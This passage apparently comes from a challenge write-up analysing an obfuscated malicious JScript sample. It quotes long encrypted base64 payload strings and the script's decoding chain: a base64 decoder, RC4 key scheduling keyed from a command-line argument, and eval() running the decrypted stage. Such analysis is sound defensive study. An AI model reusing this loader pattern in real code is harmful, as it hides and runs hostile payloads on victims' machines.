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&quot;;return qGxZ;</pre><p>I was then looking for a large string that could be the next stage in the payload. The one that stands out most here is y3zb().</p><h4>Question 10:</h4><p>The function <strong>LXv5 </strong>is important, what variable is assigned a key string value in determining what this function does?</p><h4>Answer 10:</h4><p>I am now looking for a variable inside this function that is set to a key string. Its being set up at the very beginning of the function: LUK7.</p><pre>function LXv5(d27x)<br><br>  {var LUK7 = &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;;var i;var j;var n6T8;if (d27x.length % 4 &gt; 0)<br>  return;var CHlB = d27x.length;var V8eR = d27x.charAt(CHlB - 2) === &#39;=&#39; ? 2 : d27x.charAt(CHlB - 1) === &#39;=&#39; ? 1 : 0<br>  var mjqo = new Array(d27x.length * 3 / 4 - V8eR);var z8Ht = V8eR &gt; 0 ? d27x.length - 4 : d27x.length;var t2JG = 0;</pre><h4>Question 11:</h4><p>What encoding scheme is this function responsible for decoding?</p><h4>Answer 11:</h4><p>Simply looking up the key string online revealed to me that the encoding scheme is base64.</p><h4>Question 12:</h4><p>In the function <strong>CpPT</strong>, the first two <strong>for() </strong>loops are responsible for what important part of this function?</p><h4>Answer 12:</h4><p>The question is talking about this code:</p><pre>for (var i = 0; i &lt; 256; i++)<br> {<br>  AWy7[i] = i;<br> }<br> <br> for (var i = 0; i &lt; 256; i++)<br> {<br>  V2Vl = (V2Vl + AWy7[i] + bOe3.charCodeAt(i % bOe3.length)) % 256;qyCq = AWy7[i];AWy7[i] = AWy7[V2Vl];AWy7[V2Vl] = qyCq;<br> }</pre><p>On the face of it, there is an array that is created calld AWy7. It is then filled with numerical data, which is then iterated though in the next for loop. I was a little stuck here, but this is part of encryption for RC4. Where you initalize an array to be ready for encryption, which is called Key-Scheduling Algorithm.</p><h4>Question 13:</h4><p>The function CpPT requires two arguments, where does the value of the first argument come from?</p><h4>Answer 13:</h4><p>For this I need to follow the trail, I will separate different parts of the code in the order in which I followed them.</p><pre>function CpPT(bOe3,F5vZ)<br><br>ES3c = CpPT(ssWZ,ES3c);<br><br>var ssWZ = wvy1(0);<br><br>var wvy1 = WScript.Arguments;</pre><p>The CpPT function → ES3c variable = CpPT which takes 2 variables → first argument is ssWZ → ssWZ = wvy1(0) which is an array → which gets its data from WScript.Arugments. Which is a command-line argument. The format for this answer is a little odd, I wouldn’t put a dash normally but that&#39;s the answer.</p><h4>Question 14:</h4><p>For the function <strong>CpPT</strong>, what does the first argument represent?</p><h4>Answer 14:</h4><p>Knowing that CpPT is used for encryption, the correct answer here is the key.</p><h4>Question 15:</h4><p>What encryption algorithm does the function <strong>CpPT </strong>implement in this script?</p><h4>Answer 15:</h4><p>I talked about this in question 12, the key-scheduling algorithm being used for RC4. Which is the answer here.</p><h4>Question 16:</h4><p>What function is responsible for executing the deobfuscated code?</p><h4>Answer 16:</h4><p>Knowing from a previous answer that the use of eval() in code can dynamically run something gives me a clear answer:</p><pre>eval(ES3c);</pre><h4>Question 17:</h4><p>What Windows Script Host program can be used to execute this script in command-line mode?</p><h4>Answer 17:</h4><p>This was a simple search away. One of 2 answers popped up when looking: wscript.exe and Cscript.exe. The answer for this one is the latter.</p><h4>Question 18:</h4><p>What is the name of the first function defined in the deobfuscated code?</p><h4>Answer 18:</h4><p>Next its time to look at the rather long string in the y3zb function:</p><pre>function y3zb()<br> {var qGxZ = &quot;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